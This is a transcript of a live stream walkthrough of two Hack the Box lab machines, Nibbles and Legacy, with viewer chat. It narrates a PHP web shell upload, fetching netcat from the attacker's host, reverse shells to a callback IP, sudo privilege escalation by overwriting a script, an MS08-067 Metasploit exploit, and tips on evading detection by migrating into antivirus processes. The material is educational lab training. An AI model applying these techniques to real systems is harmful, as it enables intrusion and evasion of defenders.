All right, and now we're live on YouTube. Excellent. Hey everybody, gonna do some Hack the Box Nibbles today. So it's one of the easier boxes, but I haven't solved it in a while, so we'll see how this goes. As I was talking to the other streams a minute ago, I got a new mic, so any sound issues, let me know. Hopefully it should be good, though. It should be better than the headset was. My primary concern is additional noise from like mouse clicking and keyboard and whatnot. So let me know how that is as we go. All right, and let's switch over to the streaming monitor. Cool. So here's Nibbles. Like I said, it's one of the easier boxes. Not much to say about it. We'll just jump right in. So your address is 10.75. So let's head over to here and we'll make the Nibbles box. And we'll go ahead and nmap. Go ahead and nmap it. Oh, did I get a space in there for some reason? And while that runs, we will go ahead and curl it just to see. Hello. Oh, so the first thing that you need to do when you start Hack the Box is you actually have to go to, you have to connect. So let's do that. Volume seems to be low. Okay, we can fix that, I believe. Let's move that up a little bit. Let me know if that's. Let me know how that is. But I'm glad the quality has improved. That's excellent. Now that we are actually connected, let's try this again. There we go. Okay, so there's a Hello World and Nibble blog directory has been found. Nothing interesting here. Cool. So we'll 75. Volume is fine now. Perfect. Excellent. Thank you, Xruli. I appreciate your input on that. Oh, let's get burp running. We will not update now, but I need to remember to do that. All right, burp is good. Let's turn off the intercept. Hello world, and then we're gonna do Nibble blog. All right. Now, I can't even think of how long. I spent probably an hour or two like running WP scan and all kinds of crazy stuff against this thing because I'm like, oh, it's WordPress. Like it literally just looks like WordPress. I even saw this powered by Nibble blog, but I assumed that that was maybe the theme or something. But it's important to, you know, Google things. And so Nibble blog is a legit thing. The way I finally figured it out, actually, the way I stumbled onto it is I was running GoBuster or DirSearch or something against it, and it had like it found like a Nibble blog upgrade or install endpoint, and I was like, wait, what's this? Oh, it's like literally it's literally a thing called Nibble blog. So we can. Now that we know it's Nibble blog and not WordPress, we can do some extra stuff here. So let's do some recon on what Nibbleblog is, and maybe see if there's like vulnerabilities or something. So there's cross-site scripting, which, you know, is neat in the real world, but doesn't help us as much outside of that. You know, for CTFs and the like, unless they have somebody that's or some scripts that are emulating users, generally cross-site scripting isn't very helpful. So we can kind of move on from that. What if we got a Nibbleblog 4.03 shell upload, which seems neat. There's multiple SQL injections, arbitrary file upload. That's probably plenty, to be honest. Do we have a version here? Let's check. Let's check our proxy. See if it like states the version in the code. Sometimes you can get it in these, like in these meta tags. They'll put what version it is, or they'll put like a comment or something. Let's see. We can see which specific plugins they're using. You know, in case maybe there's some vulnerable plugins or something. We don't see the version though, unfortunately. Okay, that's fine. That's fine. I would like to be able to like kind of determine that, but let's see what the newest version is. 4.0.5 is the newest version. I wonder if we can. And 4.0.3 is the last version to come out before 4.05. So as long as it's not like the newest version, I don't want to download this. Okay. Cool. Cancel. We can check when this, maybe we can check when this. Why would you migrate from GitHub to SourceForge? Oh, probably because of the Microsoft thing. It'd be cool. It'd be cool if they gave us dates. I guess we'd like download it and unzip it and see if see what dates those are. Blog overview, languages. Okay, so 403 was made in 2015. I bet that. Oh, here we go. Now I can actually see. Wow, so 405 and 404, all of these are really old, so that's not going to help us. I was thinking like maybe 404 or 405 came out really recently, and we could kind of rule that out. Let's start running. Probably should have started this earlier, but we can get. Oops. We can get like a dir search running. Let's see here. So I want UE. So let's see, dir search. Hey Chris, welcome to the Twitch stream. Oh, there's some chat up in the YouTube. So Abdeli is asking, hello, I start with 560 network penetration. So sans 560. After that, we'll take web pen test and ethical hacking, also sans. And after that, we'll learn Python. It's enough to get to OSCP after. I think that's more than enough to do OSCP after. I mean, that's a lot to do before OSCP. In fact, the web pen test class from sans is actually more advanced than the web pen test than you'll do in OSCP. The OSCP web pen test stuff is pretty basic. In fact, really the only thing that OSCP has that those classes don't is actual like buffer overflow exploitation. Like if you're taking 560 and 542 from SANS, I think you'll be more than ready enough for OSCP. Okay, so we're gonna do U, and it's 10, 10, 10, 75. E, we're gonna do PHP because Nibbles is a PHP, or Nibble blog is a PHP framework. And then do we need, what else? Oh, I guess we should do like the word list. Word list minus W. User share word list dirvester directory list medium. Oh, 2.3 medium. There we go. Okay, and that's cranking away. I migrated from Twitch to here. Oh, welcome, Plushum. Yeah, I stream to all of them now since I have the bandwidth, but I think the pen testing hacking community is a lot bigger on YouTube than Twitch. Though I started on Twitch just because they were kind of the only game in town for a while. All right, so that's going. We can also check out some of these vulnerabilities too. I don't generally like to just check out a vulnerability and then throw it at a box and see if it sticks without, you know, doing some fingerprinting and whatnot first, but we'll see. Oh, I probably should have here. We want to do this against the Nibble block directory, not just root. There. Abdeli, that's I wouldn't go advertising that. You shouldn't be distributing those. And as far as I know, SANS doesn't distribute PDF documents anyways. It goes against their terms of service of classes and stuff. I would encourage you to take their classes, like, you know, through them rather than without. The stuff that really stands out about SANS is the instructors, not the I mean, the content's great, but it's the instructors. I would say that things being available free on the internet does not necessarily make it correct to use them and distribute them. There's a lot of hard work that goes into creating that content, and you know, we should support them. It's the same reason that you know, I use Hack the Box VIP, and you know, paying for services is the way to get better services. That's not to say that everyone can afford everything. I get that too, but you know, just taking things for free is not the way we get new stuff. Welcome to the stream, Freddy. Okay, so we're getting plenty of results here from our dir search. So let's check out the README. Maybe that will have a version, and it does. We're on 4.0.3. Perfect. So that's the kind of stuff that I like to. I like to confirm that our attacks are going to work. You don't, especially on an engagement, you don't want to just start slinging stuff at the boxes at your targets, because you know, first of all, it's not very professional. You waste a bunch of time, and time is of the essence on engagements. But you know, additionally, just throwing random stuff can cause unintended consequences. And if these are, you know, in a test environment that's being used by other people for other things, you could crash that, and your customers could get pretty upset with you. Yeah, so 403 will work, or 403 is the version. So this arbitrary shell upload vulnerability should work. So we can take a look at that. Catch up on chat for a minute. Oh, hey, Pamela. It's good to see you. She likes to take stands in person because you learn so much more. I think that's accurate. I know that it adds to the cost to travel to a conference, but I have learned so much just from hanging out with the instructors. It's pretty amazing to learn from their war stories and the examples they give. It just adds a lot of value. Okay, so let's see. Let's move on with this. So we have some code here. Oh, wait a minute. Is this seriously like when uploading image files via the My Image plugin? Okay, so you need some sort of access, login access, and then you utilize the My Image upload plugin to upload PHP files instead of images. This is not even an exploit. You just upload a PHP shell ignoring the warnings. Still thinks it sounds pretty low. Okay. Let's see what... Let me turn up the gain a little bit. Okay, I turned up the gain a bit, or maybe... Let's do this. Give me 1 second here. Okay, let's turn the gain back down, and then we'll move the windows up to 70. How's that? Because my on XSplit it's maxed out as well. Okay, well, we hear that. The other thing is maybe, excuse me, maybe my mic isn't in a good place. I'm still trying to get all this set up correctly. But here we go. Okay, so I need to get some sort of login into this box. There's a /admin. What the... What is this? All right. I don't think I found this before. Is there just like a /login or something? We could also Google this. Login page. Oh, it's probably like a login.php, right? Nope. Oh, it's admin.php. Did I just go to like admin? There we go. Okay. Let's see. So let's see if there's like default logins for Nibbleblog. Set password password. Let's check that out. Nope. So it does ask you for okay. So yeah, evidently we had to guess the password. Flesh in the YouTube chat pointed out, and so the first guess was Nibbles. I mean, the first guess was password, but Nibbles was the second guess, I suppose. Just catching up on chat for a bit. Sound is better, good, excellent. Flesh is asking for detailed video about BOF using Radar 2. Yeah, so IPSEC has it, and so does Live Overflow. And frankly, for exploitation stuff, like Live Overflow is got it. I'd be happy to do some, challenges, walk through some challenges that require some buffer overflow stuff, but I don't actually know R2. I haven't used it ever, so I'd have to teach myself that first and then do a video on it. But yeah, maybe sometime in the future. All right, so we have access. So now we need to look for the my image. Is this okay? My image is working. Let's do like let's make a. I guess we don't really need this anymore. Stream HTTP nibbles. vi shell dot let's see, PHP, and we're gonna do echo pass through all right, let's do that. So we just wrote our own little PHP one-liner. Basically, it's just passing through, and we could use system or whatever. Actually, let me remember which one is which. I reference this page so often, specifically for this graph. So pass through doesn't give me output. Well, let's see here. Let's just do system. And then also, how do you concatenate strings in PHP? Oh, dot. Two into ampersand one. Okay. And so what this is going to do is if there's error text or anything, it'll output all of that into the same output stream that the browser's rendering. All right. Let's close all these windows. My image. There's a bunch of warnings. Let's see if there's certain images. Oops. There's not images. At least not in there. Oh, it's uploads here. Okay. Eh. Or we call it shell. Okay. Oh, it's literally called the image.php. Okay, cool. So we should be able to do cmd equals ID. Sweet. All right. Let's just take a kind of look around here. And just do this curling so it's easier to okay. See if it has -e capabilities. Nope. Oh man. Okay. That's not a big deal because we can do a couple things. So let's go over what I just did. So we just kind of took a look at what was around. We wanted to see if it has netcat, which it does, and then we wanted to see if the netcat had -e capabilities, which it does not. So we can do two things. One, we can transfer up a, actually, does it have nc.traditional? It does not have nc.traditional. Hey Redtail, welcome to the stream. So we can do one of two things. We can upload our own nc.traditional, which is cake, because we can just wget it from our machine. We can do the bash interactive into dev.tcp if we want. Let's do the nc.traditional because I think we've done the bash trick a couple times in the last few videos. So we'll get a HTTP server running. We're gonna figure out what our IP address is, 14.8. Excellent. Hey, Sneaking Moose, welcome to the stream. And then we will wget %20 HTTP We need to, let's do this. I'm gonna ASCII to hex here. I'm gonna wget HTTP 10 14.8 c.traditional, and we'll convert this. Grab the URL encoded version. And also what I'm forgetting here is we actually need nc.traditional to be in that directory. So that's funny. All right. So now we can grab our URL encoded string, send that. It grabbed it. We can see that it hit our web server and pulled it. So we should have it now. So if we do like a find sent 20. Ugh. I mean, it should just be in the standard directory that we were in, but it never hurts to be. Oh, I also want to into dev null because we're not root and we're going to get a whole bunch of errors back if we do it that way. Oh my goodness, it didn't translate the 200 dev null well, but we should just be able to do this. And there's the nc.traditional. So now we're going to set up a LVP 443. Camping Nova in Twitch is asking if there's a link to the CTF. We're doing Hack the Box, so it's hackthebox.eu is the link to get there. If you don't have an account, you have to hack your own invite code, which is I wouldn't call it like super easy, but it's a fairly straightforward web challenge. And the box that we're doing right now is Nibbles. So with Hack the Box, all retired machines, when they're first retired, the two most recent retired machines are available for free. All of the other ones you have to pay for VIP, and I think it's like £10 a month or something like that. Anyways, so yeah, this is where it's at, hackthebox.eu. I'll post that in the Twitch chat for you. Oh, you know what? I completely spaced. On Twitter, I posted, I think last week, asking for feedback on the stream, things that you want to see more of, tips or, changes that you'd like to see. And someone asked if I could post the commands that I ran. I neglected to be doing this that entire time, but what I am thinking about doing is I want to write like a bot or something, like maybe a Tmux plugin that'll just like dump all of the commands that I use to the various stream chats, or maybe into a Discord, and I'll set up like a specific Discord just for the streams, and it'll dump it like to Discord, and then that way you can get a log of the commands we're running, so you don't have to like pause the video and type out what I'm doing, and you can just copy and paste. Anyways, let's set up a Hey IT2W Moto. Welcome to the stream. Okay, so we have our own Netcat listener set up, so we're gonna have this guy connect out to us. We are going to grab this again. /nc.traditional e bin bash 10.10.14.8.443. Yeah, the muscle memory. IPSEC says you're not going to build the muscle memory if you copy and paste all the time. That's true. But I can see the argument for wanting to, wanting to, copy into notes or something like that. Sneaking Moose says that if you set up that Tmux plugin, you could theoretically write another plugin to take the output of Discord and pipe it directly into your own terminal. So you don't even have to follow along with me anymore. You could just have me hack the box for you. That's funny. Okay, so we're gonna dump this in. Oops, permission denied. We need to set this to executable. So we're just going to do the change mode on traditional to give it executable. Major Mosey on the Twitch chat said that piping Discord directly into the terminal sounds very safe. I agree. Oh man, that sounds awful. I feel like I, for some reason, could get in trouble with that. Somebody's like, they hacked my machine. Don't do that. Okay, and now, there we go. Okay, so we've got our stuff here. We are going to, we're going to Python, we're going to do our Python trick to get an actual shell. Spawn bin bash. There's not Python 2 here, so import, let's do Python 3. There we go. And we're gonna Control Z, we're gonna STTY, raw minus echo, FG, it's just screen. I don't think that's what they want. Okay. Hey, and we got tab complete in the whole 9 yards. Sweet. Okay. Let's. So we are Nibbler. Let's cat Etsy password. So there's a. We are Nibbler. Right? Yeah, we are Nibbler. So if we're home, so we can go into our home directory, I guess. And there's a user.txt, which we can read. So that's our user. That's our user there. That was pretty easy. So we'll find, we need to figure out how to get root. So there's a couple things here. enum.sh and monitor.sh look to have been created a couple days ago. I probably should have reset this box. But so these probably are not normal. Like that enum is probably some sort of like Linux enum. Let's yeah, just a simple enumerator looking for, you know, like privesc opportunities there. I wonder what monitor is. Huh. Okay. How However, personal is pretty old, probably from when this box was created, so we can go into personal. That's new. Oh, I'm already in stuff. Oh, this is the... It's something that those people, whoever was here first, uploaded. I don't want to take... Do I want to take the 2 minutes to reset this box? I should probably do that. Probably should have done that ahead of time. Okay, while this is resetting, we can still kind of look around the box, but I want to make sure that we're doing this on a fresh box, so I don't go down rabbit holes that aren't actually there, or regularly. So I can type, I swear. Well, that's new. Let's see here. So we can do like Flesh S, you have to wait for 2 minutes for a restart. Am I right? Yes. So once you initiate a reset, so you can see here, I initiated a reset. If somebody's actively working on that box, then they can do a cancel, right? Because if they're working on it at the moment, if they're working in the middle of something and somebody's like, oh, I want to reset it, like, it's pretty frustrating. So it's 2 minutes, but we'll need to re-exploit it, but that shouldn't be too bad. Dino Frost or Dino Frost just joined Twitch chat. Welcome. And IT2W Moto just said do sudo -L, which I did earlier, and it like kind of froze, which is weird. So I'm not sure what's going on there. It might be a oh, is it resetting? What's going on here? Sudo L is supposed to freeze. Yeah, well, it looks like it locked up the entire box. Oh, there's the reset. Cool. Yes, we can kill that pane. Horizontal. Let's kill that. Okay. So, did I put... Yeah. Stream HTB Nibbles. CD stream Nibbles. Okay. Admin Nibbles. And we'll go into the plugins. My image. Upload totes legit. Save. Make sure this works. It does. And we'll do I'm going to do Python 3 http.server 80 history. We'll grab so with history, instead you don't even have to just copy and paste. You can actually do bang and then the number there for history, and you can run that command. So in case you didn't know that, All right, so we can see that it took it, and so now we will do our NC NLVP 443, and from history we find where we did that again. We need to chmod it first. There's the chmod, so we'll 2018, and then we can 2019. And here's our connection. So we'll do our Python 3 m import pty pty.spawn bin bash. Oh, I did Python, sorry. Python 3c, not m. There we go. And we will, let's see. What was I doing? Ah, yes. We'll do back to, then we'll stty raw echo, oops, echo fg, reset, screen. All right, cool. ls, got it. Now let's go to home, Nibbles, cd home, nibbler. Okay, so personal.zip is there. Okay, cool. Okay, just catching up on chat real quick. Can't wait to see how you guys tackle Olympus. Oh man, I can't. So Olympus, Canopy, and a couple other boxes that I did relatively recently. I'm really looking forward to them getting retired. I mean, it's a bummer because I like, you know, I like that they gave me points, but oh, Aragog was another great one. But yeah, Canopy was like one of my favorites of all time. Poison was also a lot of fun. Celestial, pretty much all of these, except Sunday. I didn't particularly care for Sunday. Anyways, back to the box. What else we do? What else did I miss in chat here? Yeah. So, I mean, IPSEC does amazing videos as well, but yeah, he's right. We often do different different paths or, you know, slightly different techniques. And really, like, all of hacking is knowing how to do things multiple ways. So I think it's useful to watch multiple people. I always learn something. I generally don't watch this video until after I do my stream, just so that I'm not influenced by it. But I love watching IPSEC's videos, even though I've already finished it and, you know, even did a video on it. I love reading other people's write-ups and stuff. I learn new stuff all the time. What else did I miss? NC traditional, yeah. So NC doesn't have the -E option to get bin bash. As IT2W Moto pointed out. Taylor, the Privesc for Poison is awesome. That's actually why I'm such a big fan of that box. So I'm looking forward to you doing it. Okay, so let's take a look at personal.zip. Unzip personal.zip. Let's do this in temp so that we can clean up later. Nibbler personal.zip. Need to actually copy it. We'll unzip. Let's make dir rook. Make it even easier. All right. Alright, so there's some kind of monitor script going on. Okay, it just like pings stuff and checks out name servers and whatnot. Neat. So let's do a sudo -l. I was told that patience is a virtue. It's just not one of mine. Yeah, it looks like next box will be Nightmare. I don't know if I will have time to do this before it retires. In fact, so this is going to be my last stream for a couple weeks. I am leaving next Sunday to fly out to Charlotte to actually teach my first Sans class. So the next 2 Sundays I'll be out there doing that, and hopefully not, you know, dying. It's I'm pretty nervous, but it should be fun. I'm looking forward to it. And hopefully Sans will continue speaking to me after the fact. So I'm not sure if I'll do a video on this one. If I do, it'll be well after the fact, because by the time I get back, Aragog and Valentine will be out, which are ones that I have solved. So so that's the plan. I of course have a huge backlog of boxes that I need to get to, so Nightmare will just be the latest edition on that. Okay, so I can, with no password, run this monitor script. Cool. So that's going to be easy. So we want to go back to home nibbler, and I guess we'll unzip the personal.zip, cd personal stuff. So we already know what is in this. We just want to replace it. So here is a quick way to zero out a file. What this means, what this does is basically, if I did like echo foo into monitor.sh, what that would do is it would echo foo to standard out and then redirect that standard out into monitor.sh's standard in. A single redirect arrow is basically stomp on the content. Double arrow is append, so echo foo to the end of monitor. If you don't have anything to the left of this arrow, it just takes nothing and directs it into standard in, stomping on the file. So really quick to clear out a file. But now that it's empty, we can write whatever we want in here. So we can do something like, we could just, like what the person did before, which is like, you know, cat, you know, root flag dot text. We could add our own user. So we could like echo user into Etsy password and then SU to it that has like a 0 user ID. We could have it replace the root line in Etsy Shadow with a password that we know if we want. We could, let's see, we could just have it execute another netcat. So like we could nc nlvp like on 80, and then let's vi monitor.sh, and we will just have it in bash, and we will do a var www html nibble blog content private plugins my image nc dot traditional e bin bash 80 10 14 8 80. And if you notice, the output got all crazy up here. It's because we don't have the terminal size set in our environment variables for this new shell, and so it got all wonky. But when we catted the monitor.sh, you can see that it came out just fine. Meepzor in Twitch points out that we don't need to we don't need to do the netcat. That's accurate. We could do a spawn bash, but you know, we try and do stuff differently each time. Spawning bash is lame, boring. It would absolutely work though. So we can chmod plus x monitor.sh, and if we do monitor, oh. Let's see what's going on here. Why? Oh yeah. So Meepsor says maybe we need to wait, like with sudo. That's, or with sudo minus L. That's possible. Like any sudo command is going to take a while. Ugh. That's so lame. There's got to be some like weird thing in the sudoers file. Oh. Yeah, so if we this, I guess this this box used to be called Shocker, or they excuse me, or they like use the same image for something else. That's funny. Musor points out that I already root. Yeah, I know I'm already root. I was just trying to figure out why this took so long. So that's funny. Cool. So now we're root. So, you know, we could go over to root, check it out. There's a root.txt, and really nothing else. Cool. That was a lot of fun. Let's, how long have we been streaming here? Feels like it's been ages. Just about an hour. That's not too bad. That's not too bad at all. Cool. So that was a lot of fun, everybody. This is one of our shortest streams ever. It didn't take us 4 hours to do a simple box like it has in the past, but I had a lot of fun. One of the lines is host name. I think it's set to all normally. Oh, yeah. So yeah, if we cat Etsy sudoers, let's check that out. Yeah, I'm not sure. All is root. Yeah, I don't think anything's wrong with the sudoers file. I think it's literally because the name of Nibbles isn't in Etsy hosts. So generally speaking, like 001 is your local host, and then they use Linux admins use a shortcut of 1.1 as your host name. And then you have like, you know, Nibbles and then like nibbles.local, you know, local domain or whatever here. But this is like an old machine. So if we change this, so we can, let's do this. Let's see, hosts. No. Ugh. Oh my gosh. No. Okay. Whoa. Yeah, like, because everything is so messed up, because like all our terminals are messed up, like the what our terminal size is set to and everything, Vim is going to be weird. If we change this to Nibbles, that would kill the sudo problem. But we don't need to. Let's go to... Oh, right, everything is all messed up. So we'll just kill that pain. And we can quit out of that. They're saying for... Twitch is asking for another one. But I do have plans later. Let me check out what other retired boxes there are that I've already solved, and maybe there will be a relatively quick one. I have to be done by 2, so it has to be a pretty quick one. Legacy is super easy. I don't think I've done that one. Let's go ahead and reset this since I messed it all up. Sense I've already done a video for. Solid State I've already done a video for. Chatterbox is freaking gross. I don't really want to do that one. Mainly because Chatterbox was a really easy box. It has some weirdness to it, and I would want to explain the weirdness, and that would take a while. Because it involves, we have to talk about, you know, how big shellcode can be and all that stuff. Wait, Chatterbox was fixed? I feel like that's BS. I feel like other people should have to suffer as much as I did. Hey, thanks for coming, Pamela. I don't think I've done one for Legacy. Let's make sure. Checking my YouTube channel on the other screen here. I haven't done Legacy, so Meepsor is asking if I do Windows machines on stream. I'm not sure what you mean. I have solved some Windows boxes before, but that's I mean I do whatever, really. Okay, let's do Legacy. I'm going to kill the YouTube stream for just a minute and then restart it so that I don't it's easier for the VODs if I do it that way. So YouTube, hang tight, I'll be right back. And YouTube should be back. All right, let's give Legacy a shot. So Victor Legacy. And we'll nmap -p dash. Man, 10.4. This must have been like one of the original ones. Man, I wonder, can I figure out when I solved this thing? Because I joined Hack the Box like in the first month, I think. Yeah, Legacy was my first box. I solved it a year ago. So That's cool. I clearly don't remember this. So we'll do full TCP. And we'll do the common. See if there's a web server. That does not appear to be. Yeah, feel free to post a link to the GitHub repo. I'm always looking for more streamers, and you know, I think that's one of the things I love about the hacking stream community is everybody's pretty supportive of each other. Also, you also lose status when you lose points. You don't lose status, so you don't lose your rank. So my rank is, I think it's like pro hacker or something like that. So you don't lose your rank. You do lose your points though, which is unfortunate because like you have to get those points back to be able to like go up to the next rank, the next title. So no web server clearly. Let's see, about 65% done. Come on. Okay, we got what looks like remote desktop, Samba, and NetBIOS running. So we can do like a enum for Linux. I think it's -A, right, for like all of them. Yeah. And IP. Throw that there. Protocol failed. What version are we running? Does it say? It looks like it's letting us do null sessions here. Let's do, so 139.445 and 3389, right? And we'll call this TCP scripts. We'll run safe scripts and version detection and all that stuff too. Flesh asks, why do you care about rank? The only reason I care about rank is that you can't do endgame until you're guru. So that's the... I really want to do endgame. But other than that, I don't really care. In fact, you know, for a long time, I didn't even do machines that were not retired because I couldn't stream them. So it was a bit of like extra work for you know, something that I couldn't make use of. But now I definitely want to hit guru just for that. Hey Dasheen, welcome to the stream. Excuse me. Sorry about that. Ugh, come on. Come on. Moto's asking, what are your thoughts on being in a team? I think it's way more fun to co-op. I, I I mean, I do this with friends, but we don't have official teams or anything. Um, you know, I guess it's neat, but again, since I don't really care about what my place on the leaderboard is or anything, I feel like actually being in a team is um, is mostly for like competition purposes, and it's not really anything that matters to me. But I do this with friends, and hacking is always way more fun with friends. Oh, come on. What's going on here? Want to buy packets coming back from the host. Whoa. You're killing me. Let's make sure somebody didn't like reset it or something. Dasheen asks, I know you were a sysadmin in the past. Would you go for game development path if time go back? I actually did. I did work for a game studio for a little bit, for about a year. I worked for Turtle Rock Studios and helped ship Evolve. So that was a lot of fun. I did it as a sysadmin. So I worked with, some of the developers to help set up and design some of the infrastructure, like the cloud infrastructure. And then worked with them to identify some potential security concerns and engineer around them. I had a lot of fun at that studio, but the reality is that studios need kind of somebody that can do everything, and so a lot of my time was spent doing like desktop support kind of stuff instead of engineering. So I ended up deciding to leave for a more security focused role. But I think if you're asking about like development, that's something that I do wish I would have done more of earlier in my career, because that's kind of the glaring weak spot in my skill set today, is actual development and code. But yeah, I enjoyed making games. Now I've kind of got an interest in like designing CTFs and stuff from a game design standpoint. So I think that's kind of a way to get that creative outlet going and still kind of stay in the hacking field. All right, so scripts came back. Didn't really run anything on 445 and any of the ports. Did run some script or host stuff, so we are pretty sure that it's Windows XP. SMB security mode. Nothing too big there. Let's see here. So my guess is that, let's do this. Since we didn't do any Metasploit in the last box, we'll do Metasploit in this box. My guess is that it's just going to be like an SMB vulnerability. I hate being help desk admin. You know, when I moved, I didn't realize how much support is involved in administration until I switched to systems engineering from systems administration. And, you know, basically your entire job in tech is to make sure that end users are able to do their jobs. We we don't necessarily like to think of it that way, but that's literally what our jobs are. So there's a certain amount of support there, but it's important, I think, to find a balance and make sure that you're solving interesting problems to kind of keep up your creativity and job satisfaction, and make you feel like you're getting something done, right? So let's do, okay. So we're gonna search for like Samba, or probably not Samba, right? SMB. What? That's what happens when you set up new boxes and don't have like a checklist. All right. Yeah, I'll take care of getting the DB all set up off stream some other time. Okay. Probably. Rowan says that they're currently working through the PWK labs and getting their butt kicked. Yes. That's kind of the defining principle of the PWK labs. I mean, it's an awesome lab. I missed that lab. It was a great playground. This specifically, I think Hack the Box is a great training for PWK. There's a lot of the harder Hack the Box is harder than anything you'll run into in PWK and OSCP, but the easier boxes are like spot on for practice. Oh my goodness, that applies to a lot. MSO 8068. Oh, this is this is Conficker. 08067 is the more common one. I wonder if this will actually work. Okay, so we're gonna try and launch the Conficker, the same exploit that the Conficker used as its exploit. We are gonna launch it against Legacy. We want to use the reverse TCP Windows interpreter payload. Then we set the local host for that payload to ton 0. Oftentimes what happens if you don't do it like this, is it'll grab ETH0 first, so it'll set your local host as this, and Hack the Box cannot reach this IP address. It can only reach this IP address. So we set ton 0 specifically, and then set an L port of 443 to get around any like outgoing egress filtering, port filtering. So, you know, it's common to allow like 80 and 443 out, you know, even if they're doing other kind of filtering. So let's do this. Automatically detected. I guess we could have ran check instead of exploit, right? Boom. So get UID. We just come in as system because, you know, Windows XP. Let's take a look at or is it just sysinfo? Yeah. So if you're not familiar with Meterpreter, it's got a lot of great like built-in commands for doing all kinds of stuff. You know, all the famous like webcam stuff. I use this a lot in my you know, professionals demos. So if I'm giving security awareness talks to non-security professionals, I do this the webcam stuff quite a bit because it's flashy and kind of gets the point across. Hey Seraphine, welcome to the Twitch stream. There's other neat stuff, you know, like the sysinfo command that I just ran. You know, get what your user IDs are, find out what privileges you have. There's some Windows specific stuff, you know, enumerating what desktops are there, taking screenshots. You can start doing like keyboard capture. It's got some basic OS commands built in, but you know, it's not fully featured. So at some point you probably want to drop into a shell, though dropping into a shell will make it easier for like incident responders to detect you. So be careful with launching, you know, cmd.exe or bin bash or something like that, because a lot of monitoring scripts will pick that up. Anyways, oh, another cool thing is you can actually like migrate. So if you're, you know, sitting in a process right now, can I get my PID? Yeah. So currently I'm in 1004 in this guy, but say I wanted to be in, you know, this guy instead. You can migrate into 584. The trick here, the thing that you need to keep, you need to keep in mind is if you are currently system and you migrate into this process, for instance, you will then only have the authority of NT network service. You will no longer be system, and you can't back into the process that you were originally in. So it's important not to de-escalate yourself through this. Another thing is certain processes can't really have their memory messed with that much and still function. And if that process is critical to the system running, then you could cause the system to become unstable. So be careful with that. Things like migrating into LSAS is pretty popular. Like a lot of people like to do it, but it can quickly make the system become unstable and crash, and you don't want that happening. One of my favorite things to do is to migrate into the antivirus processes, because they have to whitelist themselves from their monitoring. So it's a good place to hide. Anyways, so that's that. That's that box. It was pretty quick. Let's catch up on chat real quick. Let's see. Yeah, Rasta Labs. Oh man, I'm building my team right now. We're just sent out an offer letter to a junior, and then we are looking for a staff and senior staff position. So if you follow me on Twitter, I've made posts about that. If you are a staff level offensive security person, please consider applying, moving to sunny San Diego. But once I get my team built, or at least the core of my team built, we're absolutely going to do Rasta Labs, because that environment looks fun. Let's see. You don't hang around TMHC any, do you? Seraphine asks. I'm not sure what TMHC is, so probably not. TMHC. Nope. Oh, the Mini Hacks Club. I do not. I have seen them around, but I haven't. I see them mentioned on Twitter quite a bit, but I haven't interacted with them directly at all. All right. So that's the end of this video. Really, there's no. Let's see. We should go to. Where is... I always forget where things are. Oh. Failed to spawn a shell with threat impersonation. Is it because I moved into... Let's see, migrate back into 1004? Hey, Pointless Video 100, welcome to the stream. We're actually just wrapping up, unfortunately, but time to do one more thing. The one thing I want to highlight is that in Windows boxes, the flags are in... Oh, is there no longer 1004? The flags in Windows boxes are in the administrator desktop, specifically. So, oh, did I... Oh, man, I lost my shell. Shell back. IPSEC is trying to get my browser to ping on the stream. I do have Hack the Box up, but I have the desktop audio muted for the streams because I'm actually listening to music right now, and I don't want my to get hit with copyright stuff. But yeah, I like hearing my browser ping. I'm like, what the hell is that sound? Oh, speaking of which, if you haven't checked it out, Hack the Box just dropped a pretty massive update today. So they reworked how private messages work, and a couple other things. So definitely go check out Hack the Box and check out their changelog, because a lot of cool stuff has happened. So let's check out, if we go back to administrator, we can go into desktop, and there's the root.txt. All right, cool. Yeah, so that's that. Pointless Video asks, how long until this is up on YouTube? It should be up pretty instantly. In fact, the original, the previous video, for what was that box that we did? Nibbles should already be up. So I'm checking right now. It does not appear to be up. I'll have to look into that. Red Raven just got their invite code while watching the stream. So excellent. Congrats on getting that. And, have fun and Hack the Box, because it's a pretty wild ride. So thanks everybody for joining. And we'll, like I said, no stream next week or the week after. So it'll probably be 3 weeks before the next stream. But until then, everybody have fun, be safe, and yeah, that's that.